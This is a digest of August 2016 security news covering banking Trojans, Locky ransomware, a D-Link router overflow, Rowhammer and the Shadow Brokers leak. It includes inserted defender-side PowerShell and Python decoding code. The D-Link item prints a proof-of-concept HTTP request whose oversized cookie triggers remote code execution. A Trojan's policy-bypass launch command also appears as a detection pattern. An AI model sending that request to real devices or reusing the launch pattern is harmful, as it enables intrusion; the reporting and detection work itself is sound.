"People on Omegle often think their chats are private and automatically get deleted once they disconnect from the conversation," Bhuyan told me. "Due to this false sense of security, people often share their sensitive information on the service. Omegle-Chat-Hack is a tool that demonstrates how insecure these online chat services are and how one can read your private messages sent over the service."
So, you should be careful with what identifiable information you share over such online services while chatting with strangers. The more personal information you share, the more chances there are for others to misuse it.
Frankly, you should take your online privacy very seriously.

Brazilian banking Trojans meet PowerShell
20.8.2016 Kaspersky Virus
Crooks are always creating new ways to improve the malware they use to target bank accounts, and now Brazilian bad guys have made an important addition to their arsenal: the use of PowerShell. Brazil is the most infected country worldwide when it comes to banking Trojans, according to our Q1 2016 report, and the quality of the malware is evolving dramatically. We found Trojan-Proxy.PowerShell.Agent.a in the wild a few days ago, marking a new achievement by Brazil’s cybercriminals.

The malware is distributed using a malicious email campaign disguised as a receipt from a mobile operator with a malicious .PIF file. After the file is executed it changes the proxy configuration in Internet Explorer to a malicious proxy server that redirects connections to phishing pages for Brazilian banks. It’s the same technique used by malicious PACs that we described in 2013, but this time no PACs are used; the changes in the system are made using a PowerShell script. As Windows 7 and newer OS versions are now the most popular in Brazil, the malware will not face a problem running on victims’ computers.

The malware has no C&C communication. After execution it spawned the process “powershell.exe” with the command line “-ExecutionPolicy Bypass -File %TEMP%\599D.tmp\599E.ps1” aiming to bypass PowerShell execution policies. The .ps1 file in the temp folder uses random names. It’s a base64 encoded script capable of making changes in the system.

Brazilian banking Trojans meet PowerShell

After some deobfuscation we can see the goal of the script: to change the Internet Settings key and enable a proxy server on it:

Brazilian banking Trojans meet PowerShell

And this is the result in the browser of the victim – a small change in the proxy settings:

Brazilian banking Trojans meet PowerShell

This change will not only affect IE but all other browsers installed on the system as well, as they tend to use the same proxy configuration set in IE. The proxy domains used in the attack are listed below. All of them use dynamic DNS services and their goal is to redirect all traffic to a server located in the Netherlands, where there are several phishing pages for Brazilian banks:


The malware also has other features of interest: it checks for the language of the OS and aborts if it’s not PTBR, a clever trick to avoid infecting Windows versions in languages other than Brazilian Portuguese.

To protect a network against malware that uses PowerShell, it is important to restrict script execution, using administrative templates so that only signed scripts are allowed to run. We are sure this is the first of many that Brazil’s bad guys will code.
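A defender-side check for the two things the article describes, the proxy change in the Internet Settings key and a script-execution policy that still lets unsigned scripts run, plus a detection rule for the launch pattern quoted above. This is an added example, not the Trojan's code and not Kaspersky's tooling; it assumes the standard Windows locations of the Internet Settings values (ProxyEnable, ProxyServer, AutoConfigURL) and of the values written by the "Turn on Script Execution" administrative template (EnableScripts and ExecutionPolicy under HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell). The proxy allow-list and the sample command line are constructed; the temp-folder names in the sample are the ones quoted in the article.

```powershell
# Added example, not the Trojan's code and not Kaspersky's tooling. Run in the context of
# the user being checked (the proxy values live under HKCU).

$AllowedProxies = @('proxy.corp.example:8080')   # constructed placeholder; use your own list

function Get-UserProxySetting {
    # The key the article shows the script modifying; shared by IE and most other browsers.
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings'
    $p = Get-ItemProperty -Path $key -ErrorAction Stop
    [pscustomobject]@{
        ProxyEnable   = [int]($p.ProxyEnable)
        ProxyServer   = [string]$p.ProxyServer
        AutoConfigURL = [string]$p.AutoConfigURL   # the malicious-PAC variant from 2013
    }
}

function Test-ProxySetting {
    param($Setting, [string[]]$Allowed)
    $findings = @()
    if ($Setting.ProxyEnable -eq 1 -and $Setting.ProxyServer -and ($Allowed -notcontains $Setting.ProxyServer)) {
        $findings += "Unexpected proxy enabled: $($Setting.ProxyServer)"
    }
    if ($Setting.AutoConfigURL) {
        $findings += "Auto-config (PAC) URL set: $($Setting.AutoConfigURL)"
    }
    return $findings
}

function Get-ScriptPolicyState {
    # 'Turn on Script Execution' (Administrative Templates > Windows Components >
    # Windows PowerShell) writes these values; AllSigned means only signed scripts run.
    $gpo = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell' -ErrorAction SilentlyContinue
    [pscustomobject]@{
        EffectivePolicy = (Get-ExecutionPolicy)                       # what this session resolves to
        MachinePolicy   = (Get-ExecutionPolicy -Scope MachinePolicy)  # the GPO-enforced scope
        GpoScripts      = if ($gpo) { $gpo.EnableScripts } else { $null }
        GpoPolicy       = if ($gpo) { $gpo.ExecutionPolicy } else { $null }
    }
}

function Test-SuspiciousPowerShellCommandLine {
    param([string]$CommandLine)
    # The launch pattern from the article: policy bypass plus a script run straight from
    # the temp folder. Useful as a rule over process-creation logs.
    ($CommandLine -match '(?i)-ExecutionPolicy\s+Bypass') -and
    ($CommandLine -match '(?i)-File\s+"?[^"]*\\Temp\\[^"]*\.ps1')
}

$issues = @(Test-ProxySetting -Setting (Get-UserProxySetting) -Allowed $AllowedProxies)
$policy = Get-ScriptPolicyState
if ($policy.MachinePolicy -ne 'AllSigned') {
    $issues += "No GPO-enforced AllSigned policy (MachinePolicy = $($policy.MachinePolicy)); unsigned .ps1 files can run"
}
if ($issues.Count -eq 0) { Write-Host 'No findings.' } else { $issues | ForEach-Object { Write-Warning $_ } }

# Constructed sample, built from the command line quoted in the article (path expanded).
$sample = 'powershell.exe -ExecutionPolicy Bypass -File C:\Users\victim\AppData\Local\Temp\599D.tmp\599E.ps1'
Write-Host "Sample launch matches the Trojan's pattern: $(Test-SuspiciousPowerShellCommandLine $sample)"
```

The MachinePolicy scope is the one worth checking because a policy set through Group Policy takes precedence over the -ExecutionPolicy Bypass parameter the Trojan passes on the command line, whereas a locally set policy does not. Execution policy alone is still not a security boundary (script text can be fed to powershell.exe without a .ps1 file), so the command-line rule and an application allow-listing control belong alongside it.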

Hash of the malware: cancelamento.pif -> MD5: 9419e7cd60487532313a43559b195cb0

Australian Police obtained access to the Love Zone Child Porn Site and Got 30 IPs from US
20.8.2016 securityaffairs Security

The Australian police had targeted the Love Zone child porn site, ran it for a while and managed to gain access at least to 30 US IPs.
Apart from FBI, there are other organizations that have tried to identify the participants of child porn websites, so that they could get their hands on them and make them pay. In fact, recently the Australian police managed to access a website called The Love Zone.

This is where they obtained at least 30 US IPs. So, instead of Americans revealing IPs overseas and prosecuting them, here it is the other way around.

The website was in the dark web and used Tor. It was based in the US, which means that the Australian police (Queensland Police Service’s Task Force Argos, to be specific) had to hack them and access their sensitive data. At some point, over 29,000 members had already subscribed to the site, which is shocking news!

In order to lure the members of the site, the police sent a video file. The members wanted to open it, of course; it was relevant to their own preferences, after all!

In more detail:

“When a user clicked on that hyperlink, the user was advised that the user was attempting to open a video file from an external website. If the user chose to open the file, a video file containing images of child pornography began to play, and the [foreign law enforcement agency] captured and recorded the IP address of the user accessing the file. FLA configured the video file to open an Internet connection outside of the Network software, thereby allowing FLA to capture the user’s actual IP address, as well as a session identifier to tie the IP address to the activity of a particular user account.”

The whole investigation is not the same as that of the FBI and its 135 US cases. Yet, the Aussies handed over the evidence they had collected to the FBI. In this way, justice would finally emerge. It is worth pointing out that the owner of the Love Zone, Shannon McCoole, is serving a 35-year sentence for child sexual abuse.

It remains unclear whether or not the investigation of the Australian police was just against US targets.

As for the FBI, the only comments about the operation of the Love Zone were the following: “The FBI, led by its Legal Attaches in numerous countries around the world, seeks to foster strategic partnerships with foreign law enforcement, intelligence, and security services as well as with other US government agencies by sharing knowledge, experience, capabilities and by exploring joint operational opportunities.”

Iran investigates possible cyber attacks behind a string of Oil Industry incidents
20.8.2016 securityaffairs Virus

Iran's cyberspace security authorities are investigating a string of fires in the country's oil and gas facilities. Accidents or cyber sabotage?
Once again, something strange is happening in Iran: the government in Tehran is investigating a recent string of incidents that occurred at critical infrastructure in the country.

Iran's Supreme National Cyberspace Council is investigating whether the oil and petrochemical fires were caused by cyber attacks; the authorities fear that nation-state actors may have launched an attack similar to Stuxnet.

The first incident occurred on July 6 at the Bouali petrochemical plant on the Persian Gulf coast. A couple of days after that fire was put out, a liquefied gas pipeline exploded at the Marun Oil and Gas Production Company, and unfortunately a worker died. On July 29 another fire occurred at the Bisotoon petrochemical plant.

The incidents were originally blamed on human error but after another explosion of a gas pipeline near Gonaveh the Iranian Petroleum Ministry started an investigation to understand the real cause of the anomalous string of incidents.

“The Iranian Petroleum Ministry, in charge of all of the affected sites, denied the plants were sabotaged and the Iranian oil minister Bijan Namdar Zanganeh said the fires and explosions were due to technical faults and human error.” reported Time.com. “However when an explosion in a gas pipeline near Gonaveh, which killed a worker, and another fire in the Imam Khomeini petrochemical plant, occurred within hours of each other on Aug. 6, the ministry refused to comment until after investigations.”

Mr. Abolhassan Firouzabadi, the secretary of Iran’s Supreme National Cyberspace Council, confirmed that a team of investigators will work on the case trying to understand if the incidents are linked and if they were caused by a cyber attack.

Source: Tehrantimes.com

“Abolhassan Firouzabadi, secretary of Iran’s Supreme National Cyberspace Council, says a team of experts will look at the possibility of cyberattacks as being a cause, Press TV reported on Sunday.

Special teams will be sent to the afflicted sites to study the possibility of cyber systems having a role in the recent fires, he said.” reported the Tehran Times.

According to SCMagazine.com, Idan Udi Edry, CEO at Nation-E, speculates that the evidence leads experts to believe that the incidents were caused by a cyberattack.

“One indicator is that some of these attacks took place within hours of each other – some people may chalk this up to coincidence, but the fact that several of these incidences took place within a few weeks gives us reason to believe an attacker learned how to successfully implement a cyberattack on Iran’s oil and gas facilities, then continued to keep doing so on larger scales,” he told SCMagazine.com in an email.

This string of incidents reopens the debate on the security of critical infrastructure and the dangers of cyber attacks.

We all have in mind what has happened in 2010, when the systems at the Natanz nuclear facility were hit with the Stuxnet malware.

A new LOCKY ransomware campaign targets the healthcare sector
20.8.2016 securityaffairs Virus

Malware researchers at FireEye security firm have spotted a new Locky ransomware campaign mainly targeting the healthcare sector.
Security experts from FireEye have spotted a Locky ransomware campaign mainly targeting the healthcare sector, Telecom and Transportation industries.


Attackers launched a massive phishing campaign to deliver the threat. The campaign hit organizations worldwide, mostly in the US, Japan and South Korea.

The threat actors behind this Locky campaign used DOCM-format email attachments to deliver the ransomware, instead of JavaScript-based downloaders.

“From our trend analysis, Locky ransomware started being delivered via DOCM format email attachments more extensively beginning in August. This marks a change from the large campaigns we observed in March, where a JavaScript based downloader was generally being used to infect systems.” reads the report published by FireEye.

“These detection spikes and change in tactics suggest that the cybercriminals are investing more to infect systems and maximize their profits. Additionally, we have observed that the delivery of Dridex via this distribution channel seems to have stopped, or nearly so, which could explain why we are seeing the Locky uptick.”

The researchers believe the crooks are investing more to compromise systems and maximize their profits. Another interesting trend reported by FireEye is the pause in the distribution of the Dridex banking Trojan through the same channel.

Experts noticed many similarities in the macro code used by the attackers in three distinct Locky campaigns running on Aug. 9, Aug. 11 and Aug. 15.

The following are the key comparisons:

Each email campaign has a specific “one-off” campaign code that is used to download the Locky ransomware payload from the malicious server.
The malicious URL embedded within the macro code is encoded using the same encoding function, but with a different key for each campaign. Each character is encoded by multiplying its ASCII code by a specified key (an integer). Hence, the decoder performs a division by the specified integer.
The downloaded payload is encoded using a 32-byte rolling XOR key. A different key is used for each campaign. Rolling XOR is described as follows:
Plain[i] = Cipher[i] ^ Key[i % length of Key], where Plain is the computed plain text, Cipher is the cipher text, Key is the XOR key, and i is the byte offset.
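The two encodings described above, reimplemented as an added analyst-side example (not FireEye's or the malware's code). It assumes the encoded URL is stored as a sequence of integers, one per character; the URL, the multiplier, the XOR key and the payload bytes below are constructed, not taken from a real campaign. The key-recovery helper goes one step beyond the text: because the decoded value is a URL, a known prefix such as "http" is enough to recover the per-campaign multiplier.

```python
"""Decoders for the two encodings FireEye describes in the Locky DOCM campaigns.

Added example, not FireEye's or the malware's code. Assumptions: the encoded
URL is held as a sequence of integers (one per character), and every sample
value below is constructed rather than taken from a real campaign.
"""
from itertools import cycle
from typing import Iterable, List, Optional


def decode_url(encoded: Iterable[int], key: int) -> str:
    """Reverse the per-campaign multiplicative encoding.

    Each character was encoded as ord(ch) * key, so the decoder divides by
    the same integer key. A value that is not an exact multiple of the key
    usually means the wrong key was supplied, so fail loudly rather than
    return garbage.
    """
    chars: List[str] = []
    for value in encoded:
        quotient, remainder = divmod(value, key)
        if remainder != 0 or not 0 <= quotient <= 0x10FFFF:
            raise ValueError(f"value {value} is not a multiple of key {key}")
        chars.append(chr(quotient))
    return "".join(chars)


def recover_url_key(encoded: List[int], known_prefix: str = "http") -> Optional[int]:
    """Recover the multiplier from an encoded URL using a known plaintext prefix.

    Analysts rarely know the campaign key up front, but the decoded value is
    a URL, so its first characters are predictable. The first encoded value
    divided by ord(prefix[0]) gives a candidate key, which is then checked
    against the rest of the prefix. Returns None if no consistent key exists.
    """
    if not encoded or not known_prefix:
        return None
    candidate, remainder = divmod(encoded[0], ord(known_prefix[0]))
    if remainder != 0 or candidate <= 0:
        return None
    prefix_ok = all(
        i < len(encoded) and encoded[i] == candidate * ord(ch)
        for i, ch in enumerate(known_prefix)
    )
    return candidate if prefix_ok else None


def rolling_xor(data: bytes, key: bytes) -> bytes:
    """Plain[i] = Cipher[i] ^ Key[i % len(Key)], as in the FireEye write-up.

    XOR is its own inverse, so the same routine encodes and decodes. The
    campaigns used a 32-byte key, but any non-empty key length works here.
    """
    if not key:
        raise ValueError("XOR key must not be empty")
    return bytes(c ^ k for c, k in zip(data, cycle(key)))


def decode_payload(cipher: bytes, key: bytes) -> bytes:
    """Decode a downloaded payload and sanity-check that it is a PE file."""
    plain = rolling_xor(cipher, key)
    if not plain.startswith(b"MZ"):
        raise ValueError("decoded payload does not start with the MZ header")
    return plain


# --- Constructed sample data (not from a real campaign) -------------------
SAMPLE_URL_KEY = 37
SAMPLE_URL = "http://example.invalid/download.php?id=1"
SAMPLE_ENCODED_URL = [ord(ch) * SAMPLE_URL_KEY for ch in SAMPLE_URL]

# 32-byte XOR key, as in the campaigns; the bytes themselves are made up.
SAMPLE_XOR_KEY = bytes(range(0x10, 0x30))
# Minimal stand-in for a PE payload: MZ header, padding, PE signature, padding.
SAMPLE_PLAIN_PAYLOAD = b"MZ" + b"\x90" * 14 + b"PE\x00\x00" + b"\x00" * 44
SAMPLE_CIPHER_PAYLOAD = rolling_xor(SAMPLE_PLAIN_PAYLOAD, SAMPLE_XOR_KEY)


if __name__ == "__main__":
    key = recover_url_key(SAMPLE_ENCODED_URL)
    print("recovered URL key:", key)
    print("decoded URL:", decode_url(SAMPLE_ENCODED_URL, key))
    payload = decode_payload(SAMPLE_CIPHER_PAYLOAD, SAMPLE_XOR_KEY)
    print("decoded payload header:", payload[:2])
```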

The evidence collected by the researchers suggests that either a single attacker or multiple attackers working in a coordinated effort are behind the three campaigns.

Emails among dumps published by WikiLeaks include 300+ pieces of malware
20.8.2016 securityaffairs Virus

A malware researcher has analyzed the attachments in the WikiLeaks email dumps and discovered more than 300 pieces of malware.
WikiLeaks has published more than 300 pieces of malicious code among its caches of dumped emails. Dr Vesselin Bontchev (@bontchev), a top Bulgarian malware researcher, has analyzed documents published by the organization and detected 324 instances of malware in its archive of dumped emails.

Checking the instances of malware, the expert found that almost every one is an attachment to a dumped email.

The malicious files are recognized by the VirusTotal malware and URL online scanning service; they were likely sent by attackers to the recipients in an attempt to hack them.

“The following table contains the confirmed malware residing on the Wikileaks site. The list is by no means exhaustive; I am just starting with the analysis. But what is listed below is definitely malware; no doubts about it.” wrote Dr Bontchev on GitHub.

“The first column contains a link to the e-mail on the Wikileaks site that contains the malicious attachment. The e-mail itself is safe to view (although the text is usually spam/scam/phish/whatever).”


The situation may be worse, because the pieces of malware found by the Bulgarian researcher were identified in an initial search effort only.

If you want to analyze the malware, adopt all the necessary countermeasures to avoid infecting your machine.

Fortunately, the pieces of malware are well known to the main antivirus solutions; according to the malware researcher, the majority of the malicious files have a VirusTotal detection rate of 80 to 100 percent.

Anyway … be careful managing email attachments from Wikileaks archives.

Remote code execution in D-Link routers

19.8.2016 Vulnerebility

D-Link has released new firmware for a number of routers to address a highly critical security vulnerability SB2016081203 (CVE-2016-5681). The affected routers are:

DIR-850L B1, DIR-822 A1, DIR-823 A1, DIR-895L A1, DIR-890L A1, DIR-885L A1, DIR-880L A1, DIR-868L B1, DIR-868L C1, DIR-817L(W) and DIR-818L(W).

The vulnerability exists within the cgibin binary, which is intended to handle session cookies. This binary is called from different parts of the D-Link web interface, including the service exposed through the WAN network interface on port 8181/TCP. A remote attacker can send a specially crafted "uid" cookie in an HTTP POST request to the "/dws/api/Login" login page, cause a buffer overflow and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may allow an attacker to obtain full access to the vulnerable device and use it to gain access to the local network.

Public exploit code was also released on the D-Link support website. Below is a dump of the HTTP POST request which can be used to trigger the buffer overflow:

----------------- REQUEST:
POST /dws/api/Login HTTP/1.1
Host: IP:8181
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: uid="A"*3220 + "AAAA" + "BBBB" +"CCCC" +"DDDD" +"EEEE" +"FFFF" +"GGGG" +"HHHH" +"XXXX" << This causes the stack buffer overflow
Connection: close

To resolve this vulnerability we recommend installing the latest version of the firmware, available from the vendor's website:

DIR-850L Rev. B1 Official FW v2.07 (v2.07WWB05)
DIR-817 Rev. Ax Official FW End Aug. 2016
DIR-818L Rev. Bx Beta FW v2.05b03beta03 End Aug. 2016
DIR-822 Rev. A1 Official FW v3.01 (v3.01WWb02)
DIR-823 Rev. A1 Official FW v1.00 (v1.00WWb05)
DIR-895L Rev. A1 Official FW v1.11 (v1.11WWb04)
DIR-890L Rev A1 Official FW v1.09 (v1.09b14)
DIR-885L Rev. A1 Official FW v1.11 (v1.11WWb07)
DIR-880L Rev. A1 Official FW v1.07 (v1.07WWb08)
DIR-868L Rev. B1 Official FW v2.03 (v2.03WWb01)
DIR-868L Rev. C1 Official FW v3.00 (v3.00WWb01)
We would also suggest filtering all traffic on TCP port 8181, at least on the WAN interface.

Compromising Linux virtual machines via FFS Rowhammer attack

19.8.2016 helpnetsecurity Attack

A group of Dutch researchers have demonstrated a variant of the Rowhammer attack that can be used to successfully compromise Linux virtual machines on cloud servers.

The Flip Feng Shui (FFS) attack is not performed by triggering a software vulnerability. Instead, it relies on exploiting the widespread Rowhammer DRAM glitch to induce bit flips in controlled physical memory pages, combined with Linux's memory deduplication system.

Compromising Linux virtual machines by taking advantage of memory deduplication

A short version of the attack sequence goes like this:

“An attacker rents a virtual server on the same host as your virtual server. Next, the attacker ensures that the hypervisor deduplicates a certain part of the memory that both virtual servers share. That means that both systems store certain information that they both process, in the same part of the physical memory. By employing the so-called rowhammer technique, the attacker is able to change the information in this memory without the hypervisor or your virtual server noticing.”

The researchers were able to perform two attacks on servers running Debian and Ubuntu. In the first one they made the server download malware instead of a software update, and in the second one they managed to access the target’s VM by corrupting their OpenSSH public keys.

According to a fact sheet published by the National Cyber Security Centre (NSCS) of the Dutch government, the attack can be leveraged against virtual machines on workstations as well as servers, but the attacker needs to have access to another virtual machine on the same host.

As the researchers didn't publish attack code, replicating these attacks is out of reach for most low-level attackers, but not for a criminal organization or a foreign intelligence service, NSCS noted.

Temporary solutions to this problem include disabling memory deduplication in the configuration of the hypervisor, or switching to (less efficient) zero-page deduplication.

The researchers informed OpenSSH, GnuPG, VM monitor vendors, and Debian and Ubuntu of the results of their research, and GnuPG has already strengthened its key signature checks to protect against the attack.

More technical details about the attack and video demonstrations can be found here and here.

Microsoft Open Sources PowerShell; Now Available for Linux and Mac OS X
19.8.2016 thehackernews IT
'Microsoft loves Linux', and this has never been more true than now.
Microsoft today made its PowerShell scripting language and command-line shell available to the open source developer community on GitHub under the permissive MIT license.
The company has also launched alpha versions of PowerShell for Linux (specifically Red Hat, Ubuntu, and CentOS) and Mac OS X, in addition, of course, to Windows.
Now, people can download binaries of the software, as well as access source code of the app from the new PowerShell GitHub page.
"Users across Windows and Linux, current and new PowerShell users, even application developers can experience a rich interactive scripting language as well as a heterogeneous automation and configuration management that works well with your existing tools," Microsoft says in its blog post.
"Your PowerShell skills are now even more marketable, and your Windows and Linux teams, who may have had to work separately, can now work together more easily."
PowerShell is Microsoft’s command line shell for Windows power users, and an extensible scripting language for automating system tasks.
Microsoft is aware that the company now operates in a "multi-platform, multi-cloud, multi-OS world." Since PowerShell is built on Microsoft's .NET platform, the company brought .NET Core, the version of .NET which runs cross-platform, to bring PowerShell to other platforms.
Microsoft has already planned to ship PowerShell "Core" with Nano Server for Windows Server 2016, and the newly announced release will run on .NET Core on Mac as well as Linux.
Although this recent release of PowerShell is Alpha-based and community supported, an official Microsoft version of PowerShell based on open source to anyone running a supported version of Windows will be published in the future, Microsoft notes.

Bitcoin.org warns of state-sponsored attacks against Bitcoin Core
19.8.2016 securityaffairs Hacking

The organization that controls the development of the Bitcoin software warns users that nation-state actors may hit the upcoming Bitcoin Core release.
The organization that controls the development of the Bitcoin system, Bitcoin.org, has warned of possible cyber attacks coordinated by nation-state attackers.

Bitcoin Core is the open source client for Bitcoin, the version Bitcoin Core 0.12.1 was released in April and a new one will be soon available (version 0.13.0).

This week, Bitcoin.org published a security notice to inform users that it is possible that the Bitcoin Core 0.13.0 version will be targeted by state-sponsored hackers.

“Bitcoin.org has reason to suspect that the binaries for the upcoming Bitcoin Core release will likely be targeted by state-sponsored attackers.” states the security notice.

“We ask the Bitcoin community, and in particular the Chinese Bitcoin community to be extra vigilant when downloading binaries from our website,”

The organization specifically warns the Chinese Bitcoin community, inviting it to be vigilant and to adopt all the necessary measures to avoid security breaches.

When dealing with a persistent attacker such as a nation-state actor, a supplementary effort by the entire community is necessary because of the adversary's capabilities.

“In such a situation, not being careful before you download binaries could cause you to lose all your coins. This malicious software might also cause your computer to participate in attacks against the Bitcoin network. We believe Chinese services such as pools and exchanges are most at risk here due to the origin of the attackers,” Bitcoin.org warned.

Bitcoin.org suggests checking the hashes of the Bitcoin Core binaries, which are cryptographically signed with a known key.

“We strongly recommend that you download that key, which should have a fingerprint of 01EA5486DE18A882D4C2684590C8019E36C2E964. You should securely verify the signature and hashes before running any Bitcoin Core binaries. This is the safest and most secure way of being confident that the binaries you’re running are the same ones created by the Core Developers.”

In a thread on news.ycombinator.com, experts discussed the fact that bitcoin.org does not implement HTTP Public Key Pinning (HPKP); this means that any government that controls a CA can generate its own certificate for bitcoin.org, hijack the site's IP and replace this page with one carrying its own fingerprint.


China controls the root CA China Internet Network Information Center (CNNIC), whose new certificates were banned last year by Mozilla and Google after one of its intermediate certificates was used to issue fake Google certificates.

Unfortunately, many threat actors are interested in launching cyber attacks against the Bitcoin users.

Recently several Bitcoin exchanges have been hacked, most notably the security breach suffered by the Asian exchange Bitfinex, which led to the theft of 120,000 Bitcoin.

The Bitcoin value dropped significantly after the discovery of the breach; a 20 percent decrease was observed.

Crooks abused Google AdSense network to deliver malware on Android Devices

19.8.2016 securityaffairs Virus

Security experts from Kaspersky spotted a malware-based campaign that abused the Google Adsense Advertising network to spread a malicious code.
Mobile malware is becoming an even more insidious threat; security experts are observing a rapid diffusion of spyware that is able to steal sensitive data from victims' mobile devices.

Also very common is malware that impersonates the login pages of the most popular applications and websites in an attempt to trick users into providing their login credentials. Such malware is able to steal private data, including banking credentials and social media account credentials.

Recently, malware researchers from Kaspersky spotted a new hacking campaign that abused Google AdSense to deliver malware to Android devices. The malware is delivered to the victim's mobile device when they visit certain Russian websites, even without any user interaction.

The malicious code asks for admin rights and attempts to steal user credentials by displaying bogus login pages. The malware is able to perform other malicious operations, such as intercepting and deleting text messages.

“By simply viewing their favorite news sites over their morning coffee users can end up downloading last-browser-update.apk, a banking Trojan detected by Kaspersky Lab solutions as Trojan-Banker.AndroidOS.Svpeng.q. There you are, minding your own business, reading the news and BOOM! – no additional clicks or following links required. And be careful – it’s still out there!” reads a blog post published by Kaspersky.


The malware leverages the Google AdSense advertising network to spread itself, and many websites use this ad network.

Google has promptly fixed the problem; according to an email from a Google spokeswoman, there is no indication that other websites are affected by the malware.

“The issue has since been resolved, a Google spokeswoman said in an email, adding that there’s no indication the attack ever affected more than one website. The company has said in the past that it works to block malware attacks from third-party ads distributed through its networks. The effort has become increasingly critical as Google and other advertising networks try to dissuade users from filtering out ads altogether with adblocking tools, which also aim to reduce ad-delivered malware and the web beacons used to track users across websites.” states fastcompany.com.

In order to protect your mobile device keep your mobile OS up to date, install apps only from legitimate app stores and install security solutions.

The NSA Hack — What, When, Where, How, Who & Why?
18.8.2016 thehackernews Hacking
You might have heard about the recent ongoing drama of the NSA hack that has sparked a larger debate on the Internet concerning the abilities of US intelligence agencies as well as their own security.
Saturday morning the news broke that a mysterious group of hackers calling themselves "The Shadow Brokers" claimed it hacked an NSA-linked group and released some NSA hacking tools with a promise to sell more private "cyber weapons" to the highest bidder.
The group dumped a bunch of private hacking tools from "Equation Group" – an elite cyber attack unit linked to the NSA – on GitHub and Tumblr.
The Shadow Brokers hacking group has published the leaked data in two parts; one includes many hacking tools designed to inject malware into various servers and another encrypted file containing the "best files" that they made available for sale for 1 Million Bitcoins.
However, GitHub deleted the files from its page, not due to any government pressure, but because the hackers were demanding cash to release more data and the company's policy doesn't allow the auction or sale of stolen property on its source code management platform.
NSA Hack Raises a Few Important Questions
The leak of advanced hacking tools allegedly stolen from the Equation Group has raised a few questions in everyone's mind:
Is Equation Group an elite cyber attack unit linked to the NSA?
Are the Equation Group Hack and leaked exploits legitimate?
If Legit, Do the advanced hacking tools actually belong to Equation Group?
Who is behind the hack? Russia?
Here's all you need to know about the NSA Hack:
Kaspersky Confirmed: Leaked Hacking Tools Belong to NSA-tied Group
According to a technical report published Tuesday by security firm Kaspersky Lab, the leaked advanced hacking tools contain digital signatures that are identical to those in hacking software and malware previously used by the Equation Group.
"While we cannot surmise the attacker's identity or motivation nor where or how this pilfered trove came to be, we can state that several hundred tools from the leak share a strong connection with our previous findings from the Equation group," Kaspersky researchers said in a blog post.
Over 300 computer files found in the Shadow Brokers archive share a common implementation of the RC5 and RC6 encryption algorithms, which have been used extensively by the Equation Group.
Also, the implementation of encryption algorithms is identical to the RC5 and RC6 code in the Equation Group malware.
"There are more than 300 files in the Shadow Brokers' archive which implement this specific variation of RC6 in 24 other forms," the researchers wrote. "The chances of all these being fakes or engineered is highly unlikely."
"The code similarity makes us believe with a high degree of confidence that the tools from the Shadow Brokers' leak are related to the malware from the Equation group."
Here's the comparison of the older Equation RC6 code and the code from the new leak, which shows that they have identical functionality and share rare specific traits in their implementation:

Kaspersky Lab previously linked Equation Group to the NSA, describing it as "a threat actor that surpasses anything known in terms of complexity and sophistication of techniques, and that has been active for almost two decades."
The security firm also claimed Equation Group to be behind a variety of malware types, including Stuxnet and Flame, which are associated with cyber attacks launched by the United States.
Former NSA Personnel also Confirms the Authenticity of Leaked Data
Now, adding more proof to the possibility and making the speculation stronger, some ex-NSA insiders say the leaked hacking tools are legitimate and linked to the NSA.
One former NSA employee who worked in its special hacking division, Tailored Access Operations (TAO), told the Washington Post that "without a doubt, they're the keys to the kingdom."
"The stuff you are talking about would undermine the security of a lot of major government and corporate networks both here and abroad," said the former TAO employee, who asked the Post to remain anonymous.
Moreover, another former TAO employee who also saw the leaked file said, "From what I saw, there was no doubt in my mind that it was legitimate."
So, after Kaspersky Lab's analysis and the former TAO employees' statements, it is clear that the leaked NSA hacking tools are legitimate.
Hack Or An Inside Job?
Moreover, it has also been speculated that the NSA hack could be an insider's job, as concluded by Matt Suiche, founder of a UAE-based security startup, after he discussed this incident with a former NSA TAO employee.
"The repository containing the NSA TAO Toolkit is stored on a physically segregated network which does not touch the internet and has no reason to (remember it's a toolkit repository)," Suiche wrote in a blog post.
"There is no reason for those files to have ever been on a staging server in the first place unless someone did it on purpose. The file hierarchy and the unchanged file naming convention tends to say that the files were directly copied from its source."
Experts and Snowden suggest Russia is behind the NSA Hack
Most cyber security experts, as well as former NSA contractor and whistleblower Edward Snowden, believe Russia to be behind the NSA hack.
In the past few weeks, WikiLeaks and an unknown hacker using the alias Guccifer 2.0 have published a large number of documents that came from the breach of the Democratic National Committee (DNC) and another separate hack of the Democratic Congressional Campaign Committee (DCCC).
Several officials from US intelligence agencies and security companies have pointed fingers towards Russia for the recent Democratic hacks, though Russia has denied any involvement.
"The Federal Bureau of Investigation and U.S. intelligence agencies have been studying the Democratic hacks, and several officials have signaled it was almost certainly carried out by Russian-affiliated hackers," the WSJ reports. "Russia has denied any involvement, but several cybersecurity companies have also released reports tying the breach to Russian hackers."
Now, both Snowden and Dave Aitel, a security expert who spent 6 years as an NSA security scientist, are speculating that the latest leak by the Shadow Brokers is in response to growing tensions between the United States and Russia over the Democratic groups' hacks.
In a stream of tweets yesterday, Snowden said the hack is likely of Russian origin, tweeting "No one knows, but I suspect this is more diplomacy than intelligence, related to the escalation around the DNC hack."
Here's the combined statement by Snowden:
"Circumstantial evidence and conventional wisdom indicate Russian responsibility. Here's why that is significant:
This leak is likely a warning that someone can prove US responsibility for any attacks that originated from this malware server. That could have significant foreign policy consequences. Particularly if any of those operations targeted US allies. Particularly if any of those operations targeted elections. Accordingly, this may be an effort to influence the calculus of decision-makers wondering how sharply to respond to the DNC hacks. TL;DR: This leak looks like a somebody sending a message that an escalation in the attribution game could get messy fast."
Following Snowden tweets, Aitel also published a blog post, saying Russia is the most likely suspect behind the Democratic hacks as well as the latest leak of the NSA spying tools.
Apart from speculation, WikiLeaks, which previously made clear its intent to harm Hillary Clinton's chances of becoming US President, also said it already owns the "auction" files from the Shadow Brokers and will publish them in "due course," though the tweet has since been deleted.
Still, many questions remain unanswered — who are the Shadow Brokers, how did the group break into Equation Group and steal their private hacking tools and malware, and is the group really willing to auction the files for 1 Million Bitcoins, or is it just a distraction?

Operation Ghoul: targeted attacks on industrial and engineering organizations
